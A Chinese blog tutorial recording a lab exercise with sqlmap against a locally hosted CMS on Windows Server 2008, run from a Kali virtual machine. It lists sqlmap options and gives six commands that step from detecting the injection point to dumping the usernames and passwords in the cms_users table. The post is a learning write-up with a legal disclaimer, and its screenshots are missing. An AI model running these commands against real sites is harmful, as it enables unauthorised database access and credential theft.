您当前的位置: 首页 >  sql

星球守护者

暂无认证

  • 0浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

记一次sqlmap的案例实验

星球守护者 发布时间:2020-02-21 12:34:47 ,浏览量:0

文章目录
    • 环境搭建
    • Sql map参数
    • 第一步 检测注入点
    • 第二步 列出所有数据库的名字
    • 第三步 列出当前数据库的名字
    • 第四步 列出表名
    • 第五步列出所有的字段名
    • 第六步 列出字段内容
    • 免责声明

环境搭建

网站搭建–window server 2008 phpstudy 测试机 kali虚拟机 在这里插入图片描述

Sql map参数 参数含义-u “url”检测注入点–dbs列出所有数据库的名字–current-db列出当前数据库的名字-D指定一个数据库–tables列出表名-T指定表名–columns列出所有的字段名-C指定字段–dump列出字段内容 第一步 检测注入点

[sqlmap -u http://192.168.139.136/cms/show.php?id=33] 在这里插入图片描述

第二步 列出所有数据库的名字

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --dbs] 在这里插入图片描述

第三步 列出当前数据库的名字

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --current-db] 在这里插入图片描述

第四步 列出表名

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables] 在这里插入图片描述

第五步列出所有的字段名

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables -T cms_users --columns] 在这里插入图片描述

第六步 列出字段内容

[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms -T cms_users -C "username,password" --dump] 在这里插入图片描述

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!

关注
打赏
1662051426
查看更多评论

最近更新

热门博客

[ 申请 ]友情链接:

ClashX教程 绘画宝宝 配音宝宝
立即登录/注册

微信扫码登录

0.0769s